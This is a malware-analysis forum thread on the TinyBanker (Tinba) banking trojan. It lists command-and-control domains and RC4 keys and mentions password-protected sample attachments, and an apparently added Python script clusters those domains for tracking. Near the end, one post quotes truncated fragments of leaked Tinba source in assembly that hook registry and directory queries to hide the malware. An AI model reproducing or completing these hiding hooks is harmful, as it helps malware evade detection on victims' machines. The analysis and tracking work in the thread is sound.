A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #15023  by Peter Kleissner
 Mon Aug 06, 2012 4:21 am
Interesting, just stumbled upon another TinyBanker sample, this one is from May 1, 2012. I have counted 4 TinyBanker botnets now in total. The data of the one I have found (the sample is attached):
Code:
monolitabuse.com        registered 2012-04-27
mon1olitabuse1.com      sinkholed 2012-05-02
mon2olit2abuse.com      sinkholed 2012-05-02
mo3nolitabus33e.com     sinkholed 2012-05-02
RC4 Key: wer8c7ygbw485ghw
There is a ThreatExpert report about the sample at http://www.threatexpert.com/report.aspx ... 660371c267 . Most of the domains (not all) of the other 3 botnets were listed on http://contagiodump.blogspot.se/2012/06/amazon.html and are:
Code:
Botnet 1:
dakotavolandos.com
dak1otavola1ndos.com
dako22tavol2andos.com
d3akotav33olandos.com
d4ak4otavolandos.com
RC4 key: e5bb6u6wv6whvje6

Botnet 2:
monsboys.biz
ieubietubviurb.com
uwyhbgwiechgi.com
RC4 key: wer8c7ygbw485ghw

Botnet 3:
azonpowzanadinoar.com
basdinopowadoar.com
sbasdinopowadoar.com
basdinopowadoar.eu
basdinopowadoar.org
RC4 key: e5bb6u6wv6whvje6
Attachments
Pw: infected
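The four domain lists above are padded variants of one stem (digits inserted into a base name) and the RC4 keys repeat across lists. The script below is an added example, not code from the post: it groups the quoted domains by digit-stripped stem and then shows which stem clusters share an RC4 key, which is the kind of pivot a sinkhole operator would do on this data. The RECORDS table is constructed from the post's own lists.

```python
import re
from collections import defaultdict

# Constructed from the lists in the post above: (domain, RC4 key) per botnet.
RECORDS = [
    ("monolitabuse.com", "wer8c7ygbw485ghw"),
    ("mon1olitabuse1.com", "wer8c7ygbw485ghw"),
    ("mon2olit2abuse.com", "wer8c7ygbw485ghw"),
    ("mo3nolitabus33e.com", "wer8c7ygbw485ghw"),
    ("dakotavolandos.com", "e5bb6u6wv6whvje6"),
    ("dak1otavola1ndos.com", "e5bb6u6wv6whvje6"),
    ("dako22tavol2andos.com", "e5bb6u6wv6whvje6"),
    ("d3akotav33olandos.com", "e5bb6u6wv6whvje6"),
    ("d4ak4otavolandos.com", "e5bb6u6wv6whvje6"),
    ("monsboys.biz", "wer8c7ygbw485ghw"),
    ("ieubietubviurb.com", "wer8c7ygbw485ghw"),
    ("uwyhbgwiechgi.com", "wer8c7ygbw485ghw"),
    ("azonpowzanadinoar.com", "e5bb6u6wv6whvje6"),
    ("basdinopowadoar.com", "e5bb6u6wv6whvje6"),
    ("sbasdinopowadoar.com", "e5bb6u6wv6whvje6"),
    ("basdinopowadoar.eu", "e5bb6u6wv6whvje6"),
    ("basdinopowadoar.org", "e5bb6u6wv6whvje6"),
]

def stem(domain: str) -> str:
    """Drop the TLD and every digit so the padded variants collapse to one stem."""
    label = domain.lower().rsplit(".", 1)[0]
    return re.sub(r"\d", "", label)

def cluster_by_stem(records):
    """Group domains by stem; each cluster records the RC4 keys seen with it."""
    clusters = defaultdict(lambda: {"domains": [], "keys": set()})
    for domain, key in records:
        c = clusters[stem(domain)]
        c["domains"].append(domain)
        c["keys"].add(key)
    return dict(clusters)

def stems_sharing_key(clusters):
    """Map each RC4 key to the sorted stems it appears with; a key reused across
    stems links infrastructure that the domain names alone would not connect."""
    by_key = defaultdict(set)
    for s, c in clusters.items():
        for k in c["keys"]:
            by_key[k].add(s)
    return {k: sorted(v) for k, v in by_key.items()}

if __name__ == "__main__":
    cl = cluster_by_stem(RECORDS)
    for s, c in sorted(cl.items()):
        print(f"{s:20s} {len(c['domains'])} domain(s)  keys={sorted(c['keys'])}")
    for k, stems in stems_sharing_key(cl).items():
        print(f"RC4 key {k} seen with stems: {stems}")
```

On this input the May sample's stem clusters alone, but its RC4 key lands it beside botnet 2, and botnets 1 and 3 share the other key.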
 #15062  by SecureBanking
 Wed Aug 08, 2012 7:17 pm
I just executed some samples of this trojan on my virtual machine and realized that most of them created wrong startup keys: the binary/directory the key pointed to didn't exist.
So after a reboot/logoff the trojan was dead.

Edit: I guess that they were older versions.
 #16122  by Cody Johnston
 Thu Oct 18, 2012 8:02 pm
Here is a fresh sample of what behaves like Tinba. Dll in system32 folder and reg entry from AppCertDlls. Something weird about this one, it caused TDSSKiller to crash when scan was started on the PC that I pulled it from. I was unable to reproduce TDSSKiller crashing on VM.

VT 20/38

https://www.virustotal.com/file/bfdd7a1 ... /analysis/

DLL and reg entries in the attachment.
Attachments
Password: infected
 #16911  by EP_X0FF
 Fri Nov 30, 2012 12:05 am
@iron12

Very good. Now go and find fresh dropper. Request removed.

For making a request here you need to meet the following requirements:

1) Be able to post in http://www.kernelmode.info/forum/viewforum.php?f=20
2) Share something from your side

For dump-style vx exchange sites -> go elsewhere.
 #23335  by EP_X0FF
 Fri Jul 11, 2014 8:20 am
grum wrote: :shock: 2012 old ver? it's lame and old
You are talking like you have the most recent version and are willing to share it (anyway it is an open source trojan now).
 #23360  by EP_X0FF
 Tue Jul 15, 2014 4:37 am
Some thoughts from the industry-leading experts

hxxps://www.opensc.ws/leaked-sources/19485-tinb ... -code.html

favorites:

About the language used:
I find it pretty funny to write a banking bot for windows in assembler... both stupid and funny...
About the code itself:
Code looks great the little i have checked.
About the compilation and testing environment:
I know how to compile, and compiles without errors. But doesn't work, I tested under XP SP3
I know how to compile
Join and compile!
XP SP3
About the experts programming skills:
well... firstly, C/C++ compiler in most circumstances will generate more optimized code in terms of size and speed...
About the "16-bit mode" (C):
basically nothing you can do in ASM, that you can't do with a modern C/C++ compiler (except for some really low level stuff, like 16-bit mode)
Some thoughts about crypters:
Crypters should help
should help, as always XD
About the rootkit part:
It is not rootkit.
About the reposting publically available pack of crapware source code:
then lets make the forum paid forum and these kind of sources can be posted in special access. un idea!
Conclusion: a fucken zoo.

I have only a little hope that none of these monkeys will blindly copy-paste anything from these "sources" anywhere without checking. Otherwise the following fuckups (just a few examples from the "not a rootkit" part) will be in every "Code looks great" (C) based malware:
Code:
NewZwEnumerateValueKey proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword
	local RealZwEnumerateKey : dword
	local nCount : dword
	local lpName : dword

	mov RealZwEnumerateKey, eax
	mov nCount, 0

	mov eax, p4
	.if p3==0
		lea eax, (KEY_VALUE_BASIC_INFORMATION ptr [eax])._Name
	.elseif p3==1
		lea eax, (KEY_VALUE_FULL_INFORMATION ptr [eax])._Name
	.else
		xor eax, eax
		push p2
		pop nCount
	.endif
	mov lpName, eax

@RealZwEnumerateKey:
	push p6					; ResultLength
	push p5					; Length
	push p4					; KeyValueInformation
	push p3					; KeyValueInformationClass
	push nCount				; Index
	push p1					; KeyHandle
	call RealZwEnumerateKey	; Real ZwEnumerateValueKey
	.if eax!=STATUS_SUCCESS
Code:
NewZwQueryDirectoryFile proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword, p7:dword, p8:dword, p9:dword, p10:dword, p11:dword
	local RealZwQueryDirectoryFile : dword

	mov RealZwQueryDirectoryFile, eax

@NextQuery:
	push p11						; RestartScan
	push p10						; FileName
	push p9							; ReturnSingleEntry
	push p8							; FileInformationClass
	push p7							; FileInformationLength
	push p6							; FileInformation
	push p5							; IoStatusBlock
	push p4							; ApcContext
	push p3							; ApcRoutine
	push p2							; Event
	push p1							; FileHandle
	call RealZwQueryDirectoryFile	; Real ZwQueryDirectoryFile
	.if eax!=STATUS_SUCCESS
		ret
Code:
	assume eax : ptr FILE_BOTH_DIRECTORY_INFORMATION, edx : ptr FILE_BOTH_DIRECTORY_INFORMATION
	mov eax, p6